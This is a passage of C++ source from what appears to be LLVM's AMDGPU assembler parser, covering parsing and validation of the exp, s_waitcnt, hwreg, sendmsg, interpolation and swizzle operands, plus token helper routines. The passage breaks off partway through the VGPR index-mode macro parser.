  // other DS opcodes use a plain offset.
  AMDGPUOperand::ImmTy OffsetType =
    (Inst.getOpcode() == AMDGPU::DS_SWIZZLE_B32_gfx10 ||
     Inst.getOpcode() == AMDGPU::DS_SWIZZLE_B32_gfx6_gfx7 ||
     Inst.getOpcode() == AMDGPU::DS_SWIZZLE_B32_vi) ? AMDGPUOperand::ImmTySwizzle :
                                                      AMDGPUOperand::ImmTyOffset;

  addOptionalImmOperand(Inst, Operands, OptionalIdx, OffsetType);

  if (!IsGdsHardcoded) {
    addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyGDS);
  }
  Inst.addOperand(MCOperand::createReg(AMDGPU::M0)); // m0
}
// Convert parsed "exp" operands to MCInst operands, computing the enable
// mask (en) from which sources are "off" and rearranging sources for the
// compressed (compr) form.
void AMDGPUAsmParser::cvtExp(MCInst &Inst, const OperandVector &Operands) {
  OptionalImmIndexMap OptionalIdx;

  // MC operand index of each of the four sources; used below for the
  // enable mask and for compr rearrangement.
  unsigned OperandIdx[4];
  unsigned EnMask = 0;
  int SrcIdx = 0;

  for (unsigned i = 1, e = Operands.size(); i != e; ++i) {
    AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[i]);

    // Add the register arguments
    if (Op.isReg()) {
      assert(SrcIdx < 4);
      OperandIdx[SrcIdx] = Inst.size();
      Op.addRegOperands(Inst, 1);
      ++SrcIdx;
      continue;
    }

    // An "off" source becomes a NoRegister placeholder.
    if (Op.isOff()) {
      assert(SrcIdx < 4);
      OperandIdx[SrcIdx] = Inst.size();
      Inst.addOperand(MCOperand::createReg(AMDGPU::NoRegister));
      ++SrcIdx;
      continue;
    }

    if (Op.isImm() && Op.getImmTy() == AMDGPUOperand::ImmTyExpTgt) {
      Op.addImmOperands(Inst, 1);
      continue;
    }

    // "done" is encoded in the opcode, not as a separate MC operand.
    if (Op.isToken() && Op.getToken() == "done")
      continue;

    // Handle optional arguments
    OptionalIdx[Op.getImmTy()] = i;
  }

  assert(SrcIdx == 4);

  bool Compr = false;
  if (OptionalIdx.find(AMDGPUOperand::ImmTyExpCompr) != OptionalIdx.end()) {
    Compr = true;
    // Compressed form: slot 1 takes the value parsed as src2, and the
    // upper two slots are cleared.
    Inst.getOperand(OperandIdx[1]) = Inst.getOperand(OperandIdx[2]);
    Inst.getOperand(OperandIdx[2]).setReg(AMDGPU::NoRegister);
    Inst.getOperand(OperandIdx[3]).setReg(AMDGPU::NoRegister);
  }

  // Enable mask: one bit per live source, or a bit pair when compressed.
  for (auto i = 0; i < SrcIdx; ++i) {
    if (Inst.getOperand(OperandIdx[i]).getReg() != AMDGPU::NoRegister) {
      EnMask |= Compr? (0x3 << i * 2) : (0x1 << i);
    }
  }

  addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyExpVM);
  addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyExpCompr);

  Inst.addOperand(MCOperand::createImm(EnMask));
}
//===----------------------------------------------------------------------===//
// s_waitcnt
//===----------------------------------------------------------------------===//
// Merge CntVal into the waitcnt encoding IntVal via the supplied
// encode/decode pair. Returns true on failure (value does not fit and
// saturation was not requested).
static bool
encodeCnt(
  const AMDGPU::IsaVersion ISA,
  int64_t &IntVal,
  int64_t CntVal,
  bool Saturate,
  unsigned (*encode)(const IsaVersion &Version, unsigned, unsigned),
  unsigned (*decode)(const IsaVersion &Version, unsigned))
{
  IntVal = encode(ISA, IntVal, CntVal);
  // If the requested count round-trips through decode, it fit the field.
  if (CntVal == decode(ISA, IntVal))
    return false;
  if (!Saturate)
    return true;
  // Saturating variant: clamp to the field's maximum instead of failing.
  IntVal = encode(ISA, IntVal, -1);
  return false;
}
// Parse one "<name>(<value>)" counter specifier of a symbolic s_waitcnt
// expression and merge the value into IntVal. Returns false on error
// (diagnostic already emitted).
bool AMDGPUAsmParser::parseCnt(int64_t &IntVal) {
  SMLoc CntLoc = getLoc();
  StringRef CntName = getTokenStr();

  if (!skipToken(AsmToken::Identifier, "expected a counter name") ||
      !skipToken(AsmToken::LParen, "expected a left parenthesis"))
    return false;

  int64_t CntVal;
  SMLoc ValLoc = getLoc();
  if (!parseExpr(CntVal))
    return false;

  AMDGPU::IsaVersion ISA = AMDGPU::getIsaVersion(getSTI().getCPU());

  bool Failed = true;
  // A "_sat" suffix clamps an out-of-range value instead of failing.
  bool Sat = CntName.endswith("_sat");

  if (CntName == "vmcnt" || CntName == "vmcnt_sat") {
    Failed = encodeCnt(ISA, IntVal, CntVal, Sat, encodeVmcnt, decodeVmcnt);
  } else if (CntName == "expcnt" || CntName == "expcnt_sat") {
    Failed = encodeCnt(ISA, IntVal, CntVal, Sat, encodeExpcnt, decodeExpcnt);
  } else if (CntName == "lgkmcnt" || CntName == "lgkmcnt_sat") {
    Failed = encodeCnt(ISA, IntVal, CntVal, Sat, encodeLgkmcnt, decodeLgkmcnt);
  } else {
    Error(CntLoc, "invalid counter name " + CntName);
    return false;
  }

  if (Failed) {
    Error(ValLoc, "too large value for " + CntName);
    return false;
  }

  if (!skipToken(AsmToken::RParen, "expected a closing parenthesis"))
    return false;

  // Specifiers may be separated by '&' or ','; a separator must be
  // followed by another counter name, not end-of-statement.
  if (trySkipToken(AsmToken::Amp) || trySkipToken(AsmToken::Comma)) {
    if (isToken(AsmToken::EndOfStatement)) {
      Error(getLoc(), "expected a counter name");
      return false;
    }
  }

  return true;
}
// Parse an s_waitcnt operand: either one or more symbolic cnt(...) clauses
// or a plain absolute expression.
OperandMatchResultTy
AMDGPUAsmParser::parseSWaitCntOps(OperandVector &Operands) {
  AMDGPU::IsaVersion ISA = AMDGPU::getIsaVersion(getSTI().getCPU());
  // Start from the all-ones mask: counters not mentioned stay at their max.
  int64_t Encoding = getWaitcntBitMask(ISA);
  SMLoc StartLoc = getLoc();

  const bool SymbolicForm =
      isToken(AsmToken::Identifier) && peekToken().is(AsmToken::LParen);
  if (SymbolicForm) {
    while (!isToken(AsmToken::EndOfStatement))
      if (!parseCnt(Encoding))
        return MatchOperand_ParseFail;
  } else if (!parseExpr(Encoding)) {
    return MatchOperand_ParseFail;
  }

  Operands.push_back(AMDGPUOperand::CreateImm(this, Encoding, StartLoc));
  return MatchOperand_Success;
}
// Any immediate is acceptable as an s_waitcnt operand.
bool AMDGPUOperand::isSWaitCnt() const { return isImm(); }
//===----------------------------------------------------------------------===//
// hwreg
//===----------------------------------------------------------------------===//
// Parse the interior of "hwreg(<reg>[, <offset>, <width>])"; the opening
// parenthesis has already been consumed by the caller. Returns false on
// error (diagnostic already emitted).
bool
AMDGPUAsmParser::parseHwregBody(OperandInfoTy &HwReg,
                                OperandInfoTy &Offset,
                                OperandInfoTy &Width) {
  using namespace llvm::AMDGPU::Hwreg;

  // The register may be specified by name or using a numeric code
  HwReg.Loc = getLoc();
  if (isToken(AsmToken::Identifier) &&
      (HwReg.Id = getHwregId(getTokenStr(), getSTI())) >= 0) {
    HwReg.IsSymbolic = true;
    lex(); // skip register name
  } else if (!parseExpr(HwReg.Id, "a register name")) {
    return false;
  }

  // A closing parenthesis here means offset/width were omitted.
  if (trySkipToken(AsmToken::RParen))
    return true;

  // parse optional params
  if (!skipToken(AsmToken::Comma, "expected a comma or a closing parenthesis"))
    return false;

  Offset.Loc = getLoc();
  if (!parseExpr(Offset.Id))
    return false;

  if (!skipToken(AsmToken::Comma, "expected a comma"))
    return false;

  Width.Loc = getLoc();
  return parseExpr(Width.Id) &&
         skipToken(AsmToken::RParen, "expected a closing parenthesis");
}
bool
AMDGPUAsmParser::validateHwreg(const OperandInfoTy &HwReg,
const OperandInfoTy &Offset,
const OperandInfoTy &Width) {
using namespace llvm::AMDGPU::Hwreg;
if (HwReg.IsSymbolic && !isValidHwreg(HwReg.Id, getSTI())) {
Error(HwReg.Loc,
"specified hardware register is not supported on this GPU");
return false;
}
if (!isValidHwreg(HwReg.Id)) {
Error(HwReg.Loc,
"invalid code of hardware register: only 6-bit values are legal");
return false;
}
if (!isValidHwregOffset(Offset.Id)) {
Error(Offset.Loc, "invalid bit offset: only 5-bit values are legal");
return false;
}
if (!isValidHwregWidth(Width.Id)) {
Error(Width.Loc,
"invalid bitfield width: only values from 1 to 32 are legal");
return false;
}
return true;
}
// Parse a hwreg operand: either the symbolic hwreg(...) macro or a plain
// 16-bit immediate.
OperandMatchResultTy
AMDGPUAsmParser::parseHwreg(OperandVector &Operands) {
  using namespace llvm::AMDGPU::Hwreg;

  int64_t ImmVal = 0;
  SMLoc Loc = getLoc();

  if (trySkipId("hwreg", AsmToken::LParen)) {
    OperandInfoTy HwReg(ID_UNKNOWN_);
    OperandInfoTy Offset(OFFSET_DEFAULT_);
    OperandInfoTy Width(WIDTH_DEFAULT_);
    if (!parseHwregBody(HwReg, Offset, Width) ||
        !validateHwreg(HwReg, Offset, Width))
      return MatchOperand_ParseFail;
    ImmVal = encodeHwreg(HwReg.Id, Offset.Id, Width.Id);
  } else if (!parseExpr(ImmVal, "a hwreg macro")) {
    return MatchOperand_ParseFail;
  } else if (ImmVal < 0 || !isUInt<16>(ImmVal)) {
    Error(Loc, "invalid immediate: only 16-bit values are legal");
    return MatchOperand_ParseFail;
  }

  Operands.push_back(
      AMDGPUOperand::CreateImm(this, ImmVal, Loc, AMDGPUOperand::ImmTyHwreg));
  return MatchOperand_Success;
}
// hwreg operands are immediates tagged ImmTyHwreg by parseHwreg().
bool
AMDGPUOperand::isHwreg() const {
  return isImmTy(ImmTyHwreg);
}
//===----------------------------------------------------------------------===//
// sendmsg
//===----------------------------------------------------------------------===//
// Parse the interior of "sendmsg(MSG[, OP[, STREAM]])"; the opening
// parenthesis has already been consumed by the caller. Returns false on
// error (diagnostic already emitted).
bool
AMDGPUAsmParser::parseSendMsgBody(OperandInfoTy &Msg,
                                  OperandInfoTy &Op,
                                  OperandInfoTy &Stream) {
  using namespace llvm::AMDGPU::SendMsg;

  // The message may be given by name or as a numeric expression.
  Msg.Loc = getLoc();
  if (isToken(AsmToken::Identifier) && (Msg.Id = getMsgId(getTokenStr())) >= 0) {
    Msg.IsSymbolic = true;
    lex(); // skip message name
  } else if (!parseExpr(Msg.Id, "a message name")) {
    return false;
  }

  if (trySkipToken(AsmToken::Comma)) {
    Op.IsDefined = true;
    Op.Loc = getLoc();
    // Operation may also be symbolic or numeric; symbolic lookup depends
    // on the message id parsed above.
    if (isToken(AsmToken::Identifier) &&
        (Op.Id = getMsgOpId(Msg.Id, getTokenStr())) >= 0) {
      lex(); // skip operation name
    } else if (!parseExpr(Op.Id, "an operation name")) {
      return false;
    }

    if (trySkipToken(AsmToken::Comma)) {
      Stream.IsDefined = true;
      Stream.Loc = getLoc();
      if (!parseExpr(Stream.Id))
        return false;
    }
  }

  return skipToken(AsmToken::RParen, "expected a closing parenthesis");
}
// Validate the parsed sendmsg fields; emits a diagnostic and returns false
// on the first failing check.
bool
AMDGPUAsmParser::validateSendMsg(const OperandInfoTy &Msg,
                                 const OperandInfoTy &Op,
                                 const OperandInfoTy &Stream) {
  using namespace llvm::AMDGPU::SendMsg;

  // Validation strictness depends on whether message is specified
  // in a symbolic or in a numeric form. In the latter case
  // only encoding possibility is checked.
  bool Strict = Msg.IsSymbolic;

  if (!isValidMsgId(Msg.Id, getSTI(), Strict)) {
    Error(Msg.Loc, "invalid message id");
    return false;
  }
  // In strict mode an operation must be present exactly when the message
  // requires one.
  if (Strict && (msgRequiresOp(Msg.Id) != Op.IsDefined)) {
    if (Op.IsDefined) {
      Error(Op.Loc, "message does not support operations");
    } else {
      Error(Msg.Loc, "missing message operation");
    }
    return false;
  }
  if (!isValidMsgOp(Msg.Id, Op.Id, getSTI(), Strict)) {
    Error(Op.Loc, "invalid operation id");
    return false;
  }
  // A stream id may only accompany operations that support streams.
  if (Strict && !msgSupportsStream(Msg.Id, Op.Id) && Stream.IsDefined) {
    Error(Stream.Loc, "message operation does not support streams");
    return false;
  }
  if (!isValidMsgStream(Msg.Id, Op.Id, Stream.Id, getSTI(), Strict)) {
    Error(Stream.Loc, "invalid message stream id");
    return false;
  }
  return true;
}
// Parse a sendmsg operand: either the symbolic sendmsg(...) macro or a
// plain 16-bit immediate.
OperandMatchResultTy
AMDGPUAsmParser::parseSendMsgOp(OperandVector &Operands) {
  using namespace llvm::AMDGPU::SendMsg;

  int64_t ImmVal = 0;
  SMLoc Loc = getLoc();

  if (trySkipId("sendmsg", AsmToken::LParen)) {
    OperandInfoTy Msg(ID_UNKNOWN_);
    OperandInfoTy Op(OP_NONE_);
    OperandInfoTy Stream(STREAM_ID_NONE_);
    if (!parseSendMsgBody(Msg, Op, Stream) ||
        !validateSendMsg(Msg, Op, Stream))
      return MatchOperand_ParseFail;
    ImmVal = encodeMsg(Msg.Id, Op.Id, Stream.Id);
  } else if (!parseExpr(ImmVal, "a sendmsg macro")) {
    return MatchOperand_ParseFail;
  } else if (ImmVal < 0 || !isUInt<16>(ImmVal)) {
    Error(Loc, "invalid immediate: only 16-bit values are legal");
    return MatchOperand_ParseFail;
  }

  Operands.push_back(
      AMDGPUOperand::CreateImm(this, ImmVal, Loc, AMDGPUOperand::ImmTySendMsg));
  return MatchOperand_Success;
}
// sendmsg operands are immediates tagged ImmTySendMsg by parseSendMsgOp().
bool
AMDGPUOperand::isSendMsg() const {
  return isImmTy(ImmTySendMsg);
}
//===----------------------------------------------------------------------===//
// v_interp
//===----------------------------------------------------------------------===//
// Parse a v_interp slot keyword (p10/p20/p0) into an InterpSlot operand.
OperandMatchResultTy AMDGPUAsmParser::parseInterpSlot(OperandVector &Operands) {
  StringRef Kw;
  SMLoc S = getLoc();
  if (!parseId(Kw))
    return MatchOperand_NoMatch;

  // Map the slot keyword to its encoding.
  int Slot;
  if (Kw == "p10")
    Slot = 0;
  else if (Kw == "p20")
    Slot = 1;
  else if (Kw == "p0")
    Slot = 2;
  else
    Slot = -1;

  if (Slot == -1) {
    Error(S, "invalid interpolation slot");
    return MatchOperand_ParseFail;
  }

  Operands.push_back(AMDGPUOperand::CreateImm(this, Slot, S,
                                              AMDGPUOperand::ImmTyInterpSlot));
  return MatchOperand_Success;
}
// Parse "attr<N>.<chan>" (e.g. attr3.x) into an InterpAttr operand followed
// by an AttrChan operand.
OperandMatchResultTy AMDGPUAsmParser::parseInterpAttr(OperandVector &Operands) {
  StringRef Str;
  SMLoc S = getLoc();

  if (!parseId(Str))
    return MatchOperand_NoMatch;
  if (!Str.startswith("attr")) {
    Error(S, "invalid interpolation attribute");
    return MatchOperand_ParseFail;
  }

  // The channel is the trailing ".x"/".y"/".z"/".w".
  StringRef Chan = Str.take_back(2);
  int AttrChan = StringSwitch<int>(Chan)
    .Case(".x", 0)
    .Case(".y", 1)
    .Case(".z", 2)
    .Case(".w", 3)
    .Default(-1);
  if (AttrChan == -1) {
    Error(S, "invalid or missing interpolation attribute channel");
    return MatchOperand_ParseFail;
  }

  // Strip the channel suffix and the "attr" prefix, leaving the number.
  Str = Str.drop_back(2).drop_front(4);

  uint8_t Attr;
  if (Str.getAsInteger(10, Attr)) {
    Error(S, "invalid or missing interpolation attribute number");
    return MatchOperand_ParseFail;
  }

  if (Attr > 63) {
    Error(S, "out of bounds interpolation attribute number");
    return MatchOperand_ParseFail;
  }

  // Point the channel operand's location at the suffix within the token.
  SMLoc SChan = SMLoc::getFromPointer(Chan.data());

  Operands.push_back(AMDGPUOperand::CreateImm(this, Attr, S,
                                              AMDGPUOperand::ImmTyInterpAttr));
  Operands.push_back(AMDGPUOperand::CreateImm(this, AttrChan, SChan,
                                              AMDGPUOperand::ImmTyAttrChan));
  return MatchOperand_Success;
}
//===----------------------------------------------------------------------===//
// exp
//===----------------------------------------------------------------------===//
// Parse an exp target keyword into an ExpTgt operand.
OperandMatchResultTy AMDGPUAsmParser::parseExpTgt(OperandVector &Operands) {
  using namespace llvm::AMDGPU::Exp;

  StringRef Str;
  SMLoc S = getLoc();

  if (!parseId(Str))
    return MatchOperand_NoMatch;

  const unsigned TgtId = getTgtId(Str);
  if (TgtId == ET_INVALID) {
    Error(S, "invalid exp target");
    return MatchOperand_ParseFail;
  }
  if (!isSupportedTgtId(TgtId, getSTI())) {
    Error(S, "exp target is not supported on this GPU");
    return MatchOperand_ParseFail;
  }

  Operands.push_back(AMDGPUOperand::CreateImm(this, TgtId, S,
                                              AMDGPUOperand::ImmTyExpTgt));
  return MatchOperand_Success;
}
//===----------------------------------------------------------------------===//
// parser helpers
//===----------------------------------------------------------------------===//
// True when Token is an identifier whose spelling is exactly Id.
bool AMDGPUAsmParser::isId(const AsmToken &Token, const StringRef Id) const {
  if (!Token.is(AsmToken::Identifier))
    return false;
  return Token.getString() == Id;
}
// True when the current token is the identifier Id.
bool AMDGPUAsmParser::isId(const StringRef Id) const { return isId(getToken(), Id); }
// True when the current token has the given kind.
bool AMDGPUAsmParser::isToken(const AsmToken::TokenKind Kind) const {
  return Kind == getTokenKind();
}
// Consume the identifier Id if it is the current token; no-op otherwise.
bool AMDGPUAsmParser::trySkipId(const StringRef Id) {
  if (!isId(Id))
    return false;
  lex();
  return true;
}
bool
AMDGPUAsmParser::trySkipId(const StringRef Pref, const StringRef Id) {
if (isToken(AsmToken::Identifier)) {
StringRef Tok = getTokenStr();
if (Tok.startswith(Pref) && Tok.drop_front(Pref.size()) == Id) {
lex();
return true;
}
}
return false;
}
// Consume the identifier Id and the token of kind Kind that follows it,
// but only when both are present.
bool AMDGPUAsmParser::trySkipId(const StringRef Id, const AsmToken::TokenKind Kind) {
  if (!isId(Id) || !peekToken().is(Kind))
    return false;
  lex(); // consume the identifier
  lex(); // consume the trailing token
  return true;
}
// Consume the current token if it has the given kind; no-op otherwise.
bool AMDGPUAsmParser::trySkipToken(const AsmToken::TokenKind Kind) {
  if (!isToken(Kind))
    return false;
  lex();
  return true;
}
// Like trySkipToken, but emits ErrMsg at the current location on mismatch.
bool AMDGPUAsmParser::skipToken(const AsmToken::TokenKind Kind,
                                const StringRef ErrMsg) {
  if (trySkipToken(Kind))
    return true;
  Error(getLoc(), ErrMsg);
  return false;
}
bool
AMDGPUAsmParser::parseExpr(int64_t &Imm, StringRef Expected) {
SMLoc S = getLoc();
const MCExpr *Expr;
if (Parser.parseExpression(Expr))
return false;
if (Expr->evaluateAsAbsolute(Imm))
return true;
if (Expected.empty()) {
Error(S, "expected absolute expression");
} else {
Error(S, Twine("expected ", Expected) +
Twine(" or an absolute expression"));
}
return false;
}
// Parse an expression and push it as an operand: an immediate when it
// evaluates to an absolute value, otherwise a symbolic expression.
bool AMDGPUAsmParser::parseExpr(OperandVector &Operands) {
  SMLoc StartLoc = getLoc();

  const MCExpr *E;
  if (Parser.parseExpression(E))
    return false;

  int64_t Value;
  if (E->evaluateAsAbsolute(Value))
    Operands.push_back(AMDGPUOperand::CreateImm(this, Value, StartLoc));
  else
    Operands.push_back(AMDGPUOperand::CreateExpr(this, E, StartLoc));
  return true;
}
// Consume a string token into Val; emits ErrMsg if the current token is
// not a string.
bool AMDGPUAsmParser::parseString(StringRef &Val, const StringRef ErrMsg) {
  if (!isToken(AsmToken::String)) {
    Error(getLoc(), ErrMsg);
    return false;
  }
  Val = getToken().getStringContents();
  lex();
  return true;
}
// Consume an identifier token into Val. An empty ErrMsg means absence is
// a soft failure: no diagnostic is emitted.
bool AMDGPUAsmParser::parseId(StringRef &Val, const StringRef ErrMsg) {
  if (!isToken(AsmToken::Identifier)) {
    if (!ErrMsg.empty())
      Error(getLoc(), ErrMsg);
    return false;
  }
  Val = getTokenStr();
  lex();
  return true;
}
// Current (unconsumed) token from the underlying parser.
AsmToken AMDGPUAsmParser::getToken() const { return Parser.getTok(); }
// Look one token ahead without consuming it. At end-of-statement the
// current token is returned instead, so we never peek past the line.
AsmToken AMDGPUAsmParser::peekToken() {
  if (isToken(AsmToken::EndOfStatement))
    return getToken();
  return getLexer().peekTok();
}
// Fill Tokens with lookahead; any slots the lexer could not fill are
// padded with Error tokens so callers can index unconditionally.
void AMDGPUAsmParser::peekTokens(MutableArrayRef<AsmToken> Tokens) {
  const auto NumPeeked = getLexer().peekTokens(Tokens);
  for (auto I = NumPeeked; I < Tokens.size(); ++I)
    Tokens[I] = AsmToken(AsmToken::Error, "");
}
// Kind of the current token.
AsmToken::TokenKind AMDGPUAsmParser::getTokenKind() const {
  return getLexer().getKind();
}
// Source location of the current token.
SMLoc AMDGPUAsmParser::getLoc() const { return getToken().getLoc(); }
// Spelling of the current token.
StringRef AMDGPUAsmParser::getTokenStr() const { return getToken().getString(); }
// Advance to the next token.
void AMDGPUAsmParser::lex() { Parser.Lex(); }
// Location of the last parsed operand satisfying Test; falls back to the
// first operand (the mnemonic) when none matches.
SMLoc
AMDGPUAsmParser::getOperandLoc(std::function<bool(const AMDGPUOperand&)> Test,
                               const OperandVector &Operands) const {
  // Scan backwards so the most recently parsed match wins.
  for (unsigned I = Operands.size() - 1; I > 0; --I) {
    AMDGPUOperand &Cand = ((AMDGPUOperand &)*Operands[I]);
    if (Test(Cand))
      return Cand.getStartLoc();
  }
  return ((AMDGPUOperand &)*Operands[0]).getStartLoc();
}
// Location of the last immediate operand of the given type.
SMLoc AMDGPUAsmParser::getImmLoc(AMDGPUOperand::ImmTy Type,
                                 const OperandVector &Operands) const {
  return getOperandLoc(
      [Type](const AMDGPUOperand &Op) { return Op.isImmTy(Type); }, Operands);
}
// Location of the last operand referring to the given register.
SMLoc AMDGPUAsmParser::getRegLoc(unsigned Reg,
                                 const OperandVector &Operands) const {
  return getOperandLoc(
      [Reg](const AMDGPUOperand &Op) {
        return Op.isRegKind() && Op.getReg() == Reg;
      },
      Operands);
}
// Location of the last literal (or expression) operand.
SMLoc AMDGPUAsmParser::getLitLoc(const OperandVector &Operands) const {
  return getOperandLoc(
      [](const AMDGPUOperand &Op) {
        return Op.IsImmKindLiteral() || Op.isExpr();
      },
      Operands);
}
// Location of the last inline-constant immediate operand.
SMLoc AMDGPUAsmParser::getConstLoc(const OperandVector &Operands) const {
  return getOperandLoc(
      [](const AMDGPUOperand &Op) { return Op.isImmKindConst(); }, Operands);
}
//===----------------------------------------------------------------------===//
// swizzle
//===----------------------------------------------------------------------===//
LLVM_READNONE
// Pack the three masks into their fields of a BITMASK_PERM swizzle encoding.
static unsigned
encodeBitmaskPerm(const unsigned AndMask,
                  const unsigned OrMask,
                  const unsigned XorMask) {
  using namespace llvm::AMDGPU::Swizzle;

  unsigned Enc = BITMASK_PERM_ENC;
  Enc |= AndMask << BITMASK_AND_SHIFT;
  Enc |= OrMask << BITMASK_OR_SHIFT;
  Enc |= XorMask << BITMASK_XOR_SHIFT;
  return Enc;
}
// Parse one comma-prefixed swizzle macro operand and range-check it
// against [MinVal, MaxVal]; Loc receives the operand's location.
bool
AMDGPUAsmParser::parseSwizzleOperand(int64_t &Op,
                                     const unsigned MinVal,
                                     const unsigned MaxVal,
                                     const StringRef ErrMsg,
                                     SMLoc &Loc) {
  if (!skipToken(AsmToken::Comma, "expected a comma"))
    return false;

  Loc = getLoc();
  if (!parseExpr(Op))
    return false;

  if (Op >= MinVal && Op <= MaxVal)
    return true;
  Error(Loc, ErrMsg);
  return false;
}
bool
AMDGPUAsmParser::parseSwizzleOperands(const unsigned OpNum, int64_t* Op,
const unsigned MinVal,
const unsigned MaxVal,
const StringRef ErrMsg) {
SMLoc Loc;
for (unsigned i = 0; i < OpNum; ++i) {
if (!parseSwizzleOperand(Op[i], MinVal, MaxVal, ErrMsg, Loc))
return false;
}
return true;
}
// Parse the QUAD_PERM swizzle macro body: four 2-bit lane selectors.
bool
AMDGPUAsmParser::parseSwizzleQuadPerm(int64_t &Imm) {
  using namespace llvm::AMDGPU::Swizzle;

  int64_t Lane[LANE_NUM];
  if (!parseSwizzleOperands(LANE_NUM, Lane, 0, LANE_MAX,
                            "expected a 2-bit lane id"))
    return false;

  // Pack the lane selectors into the QUAD_PERM encoding.
  Imm = QUAD_PERM_ENC;
  for (unsigned I = 0; I != LANE_NUM; ++I)
    Imm |= Lane[I] << (LANE_SHIFT * I);
  return true;
}
bool
AMDGPUAsmParser::parseSwizzleBroadcast(int64_t &Imm) {
using namespace llvm::AMDGPU::Swizzle;
SMLoc Loc;
int64_t GroupSize;
int64_t LaneIdx;
if (!parseSwizzleOperand(GroupSize,
2, 32,
"group size must be in the interval [2,32]",
Loc)) {
return false;
}
if (!isPowerOf2_64(GroupSize)) {
Error(Loc, "group size must be a power of two");
return false;
}
if (parseSwizzleOperand(LaneIdx,
0, GroupSize - 1,
"lane id must be in the interval [0,group size - 1]",
Loc)) {
Imm = encodeBitmaskPerm(BITMASK_MAX - GroupSize + 1, LaneIdx, 0);
return true;
}
return false;
}
bool
AMDGPUAsmParser::parseSwizzleReverse(int64_t &Imm) {
using namespace llvm::AMDGPU::Swizzle;
SMLoc Loc;
int64_t GroupSize;
if (!parseSwizzleOperand(GroupSize,
2, 32,
"group size must be in the interval [2,32]",
Loc)) {
return false;
}
if (!isPowerOf2_64(GroupSize)) {
Error(Loc, "group size must be a power of two");
return false;
}
Imm = encodeBitmaskPerm(BITMASK_MAX, 0, GroupSize - 1);
return true;
}
bool
AMDGPUAsmParser::parseSwizzleSwap(int64_t &Imm) {
using namespace llvm::AMDGPU::Swizzle;
SMLoc Loc;
int64_t GroupSize;
if (!parseSwizzleOperand(GroupSize,
1, 16,
"group size must be in the interval [1,16]",
Loc)) {
return false;
}
if (!isPowerOf2_64(GroupSize)) {
Error(Loc, "group size must be a power of two");
return false;
}
Imm = encodeBitmaskPerm(BITMASK_MAX, 0, GroupSize);
return true;
}
// Parse the BITMASK_PERM swizzle macro body: a 5-character control string,
// MSB-first, where each character selects how that bit of the lane id is
// transformed: '0' -> force 0, '1' -> force 1, 'p' -> pass, 'i' -> invert.
bool
AMDGPUAsmParser::parseSwizzleBitmaskPerm(int64_t &Imm) {
  using namespace llvm::AMDGPU::Swizzle;

  if (!skipToken(AsmToken::Comma, "expected a comma"))
    return false;

  StringRef Ctl;
  SMLoc StrLoc = getLoc();
  if (!parseString(Ctl))
    return false;
  if (Ctl.size() != BITMASK_WIDTH) {
    Error(StrLoc, "expected a 5-character mask");
    return false;
  }

  unsigned AndMask = 0, OrMask = 0, XorMask = 0;
  for (size_t I = 0; I < Ctl.size(); ++I) {
    const unsigned Bit = 1 << (BITMASK_WIDTH - 1 - I);
    const char C = Ctl[I];
    if (C == '0') {
      // Bit forced to zero: selected by no mask.
    } else if (C == '1') {
      OrMask |= Bit;
    } else if (C == 'p') {
      AndMask |= Bit;
    } else if (C == 'i') {
      AndMask |= Bit;
      XorMask |= Bit;
    } else {
      Error(StrLoc, "invalid mask");
      return false;
    }
  }

  Imm = encodeBitmaskPerm(AndMask, OrMask, XorMask);
  return true;
}
// Parse a raw numeric swizzle offset; must fit in 16 bits.
bool
AMDGPUAsmParser::parseSwizzleOffset(int64_t &Imm) {
  SMLoc OffsetLoc = getLoc();

  if (!parseExpr(Imm, "a swizzle macro"))
    return false;
  if (isUInt<16>(Imm))
    return true;
  Error(OffsetLoc, "expected a 16-bit offset");
  return false;
}
// Parse "swizzle(MODE, ...)" after the "swizzle" keyword, dispatching on
// the mode keyword inside the parentheses.
bool
AMDGPUAsmParser::parseSwizzleMacro(int64_t &Imm) {
  using namespace llvm::AMDGPU::Swizzle;

  if (!skipToken(AsmToken::LParen, "expected a left parentheses"))
    return false;

  SMLoc ModeLoc = getLoc();
  bool Ok = false;

  if (trySkipId(IdSymbolic[ID_QUAD_PERM]))
    Ok = parseSwizzleQuadPerm(Imm);
  else if (trySkipId(IdSymbolic[ID_BITMASK_PERM]))
    Ok = parseSwizzleBitmaskPerm(Imm);
  else if (trySkipId(IdSymbolic[ID_BROADCAST]))
    Ok = parseSwizzleBroadcast(Imm);
  else if (trySkipId(IdSymbolic[ID_SWAP]))
    Ok = parseSwizzleSwap(Imm);
  else if (trySkipId(IdSymbolic[ID_REVERSE]))
    Ok = parseSwizzleReverse(Imm);
  else
    Error(ModeLoc, "expected a swizzle mode");

  return Ok && skipToken(AsmToken::RParen, "expected a closing parentheses");
}
// Parse the optional ds_swizzle "offset:" operand: either a swizzle(...)
// macro or a raw 16-bit offset.
OperandMatchResultTy
AMDGPUAsmParser::parseSwizzleOp(OperandVector &Operands) {
  SMLoc S = getLoc();
  int64_t Imm = 0;

  // Swizzle "offset" operand is optional.
  // If it is omitted, try parsing other optional operands.
  if (!trySkipId("offset"))
    return parseOptionalOpr(Operands);

  bool Ok = false;
  if (skipToken(AsmToken::Colon, "expected a colon"))
    Ok = trySkipId("swizzle") ? parseSwizzleMacro(Imm) : parseSwizzleOffset(Imm);

  // The operand is pushed even on failure so the matcher sees it.
  Operands.push_back(
      AMDGPUOperand::CreateImm(this, Imm, S, AMDGPUOperand::ImmTySwizzle));
  return Ok ? MatchOperand_Success : MatchOperand_ParseFail;
}
// Swizzle operands are immediates tagged ImmTySwizzle by parseSwizzleOp().
bool AMDGPUOperand::isSwizzle() const { return isImmTy(ImmTySwizzle); }
//===----------------------------------------------------------------------===//
// VGPR Index Mode
//===----------------------------------------------------------------------===//
// Parse the body of "gpr_idx(MODE[,MODE...])" after the opening
// parenthesis. Returns the mode bitmask, OFF for an empty list, or UNDEF
// on error (diagnostic already emitted).
int64_t AMDGPUAsmParser::parseGPRIdxMacro() {
  using namespace llvm::AMDGPU::VGPRIndexMode;

  if (trySkipToken(AsmToken::RParen)) {
    return OFF;
  }

  int64_t Imm = 0;

  while (true) {
    unsigned Mode = 0;
    SMLoc S = getLoc();

    // Match one of the symbolic mode names.
    for (unsigned ModeId = ID_MIN; ModeId <= ID_MAX; ++ModeId) {
      if (trySkipId(IdSymbolic[ModeId])) {
        Mode = 1 << ModeId;
        break;
      }
    }

